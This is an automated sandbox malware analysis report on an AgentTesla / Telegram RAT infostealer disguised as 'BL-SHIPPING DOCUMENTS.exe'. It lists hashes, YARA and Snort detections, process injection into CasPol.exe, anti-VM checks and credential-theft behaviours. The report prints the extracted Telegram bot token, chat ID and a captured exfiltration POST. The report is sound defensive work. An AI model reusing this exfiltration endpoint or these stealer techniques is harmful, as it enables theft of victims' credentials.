Edit tour

Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name:	BL-SHIPPING DOCUMENTS.exe
Analysis ID:	756203
MD5:	69fe54a9cafee09f25e0d3f7a51488c7
SHA1:	747373a2640c7fca04258681c7ec313be3b0db24
SHA256:	dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags:	agentteslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Sample is not signed and drops a device driver

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Executable has a suspicious name (potential lure to open the executable)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Enables driver privileges

Drops PE files

Creates driver files

Spawns drivers

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates or modifies windows services

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

BL-SHIPPING DOCUMENTS.exe (PID: 6116 cmdline: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe MD5: 69FE54A9CAFEE09F25E0D3F7A51488C7)

CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31be8:$a13: get_DnsResolver 0x30301:$a20: get_LastAccessed 0x325f5:$a27: set_InternalServerPort 0x3292a:$a30: set_GuidMasterKey 0x30413:$a33: get_Clipboard 0x30421:$a34: get_Keyboard 0x317bf:$a35: get_ShiftKeyDown 0x317d0:$a36: get_AltKeyDown 0x3042e:$a37: get_Password 0x30f1a:$a38: get_PasswordHash 0x32029:$a39: get_DefaultCredentials
00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 5312	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 5312	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: CasPol.exe PID: 5312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 5312	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x38ea:$a13: get_DnsResolver 0x2263:$a20: get_LastAccessed 0x42a6:$a27: set_InternalServerPort 0x450d:$a30: set_GuidMasterKey 0x235e:$a33: get_Clipboard 0x236c:$a34: get_Keyboard 0x355d:$a35: get_ShiftKeyDown 0x356e:$a36: get_AltKeyDown 0x2379:$a37: get_Password 0x2dc1:$a38: get_PasswordHash 0x3cff:$a39: get_DefaultCredentials
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.CasPol.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.0.CasPol.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.0.CasPol.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x348d8:$s10: logins 0x34358:$s11: credential 0x30613:$g1: get_Clipboard 0x30621:$g2: get_Keyboard 0x3062e:$g3: get_Password 0x319af:$g4: get_CtrlKeyDown 0x319bf:$g5: get_ShiftKeyDown 0x319d0:$g6: get_AltKeyDown
1.0.CasPol.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31de8:$a13: get_DnsResolver 0x30501:$a20: get_LastAccessed 0x327f5:$a27: set_InternalServerPort 0x32b2a:$a30: set_GuidMasterKey 0x30613:$a33: get_Clipboard 0x30621:$a34: get_Keyboard 0x319bf:$a35: get_ShiftKeyDown 0x319d0:$a36: get_AltKeyDown 0x3062e:$a37: get_Password 0x3111a:$a38: get_PasswordHash 0x32229:$a39: get_DefaultCredentials

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.5149.154.167.220497054432851779 11/29/22-20:01:10.306536
SID:	2851779
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: BL-SHIPPING DOCUMENTS.exe	ReversingLabs: Detection: 22%
Source: BL-SHIPPING DOCUMENTS.exe	Virustotal: Detection: 26%			Perma Link

Machine Learning detection for sample

Source: BL-SHIPPING DOCUMENTS.exe

Joe Sandbox ML: detected

Source: 1.0.CasPol.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 1.0.CasPol.exe.400000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Source: CasPol.exe.5312.1.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: BL-SHIPPING DOCUMENTS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://TcwLAp.com
Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://FZsMKmQQms.net
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4
Source: ?????.sys.0.dr	String found in binary or memory: https://www.sysinternals.com0
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: BL-SHIPPING DOCUMENTS.exe

.NET source code contains very large array initializations

Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.cs	Large array initialization: get_hii: array initializer size 481808
Source: 1.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7B11A2CAu002d4195u002d4BA6u002d80B6u002d4DED58549CE3u007d/AB3968EDu002d5083u002d4DC4u002d8042u002dAEEF6AA978C6.cs	Large array initialization: .cctor: array initializer size 10967

Executable has a suspicious name (potential lure to open the executable)

Source: BL-SHIPPING DOCUMENTS.exe

Static file information: Suspicious name

Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_013DF928	1_2_013DF928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_062276F0	1_2_062276F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0622CF70	1_2_0622CF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0622A4C0	1_2_0622A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06225BC0	1_2_06225BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0622768E	1_2_0622768E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06225A70	1_2_06225A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0622F2E0	1_2_0622F2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06223330	1_2_06223330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0623BE8D	1_2_0623BE8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06239330	1_2_06239330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0623AF88	1_2_0623AF88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_062355A0	1_2_062355A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06237F80	1_2_06237F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06235148	1_2_06235148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06260040	1_2_06260040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06266BA8	1_2_06266BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06264940	1_2_06264940

Source: BL-SHIPPING DOCUMENTS.exe

Static PE information: No import functions for PE file found

Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe	Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe

Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe

Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe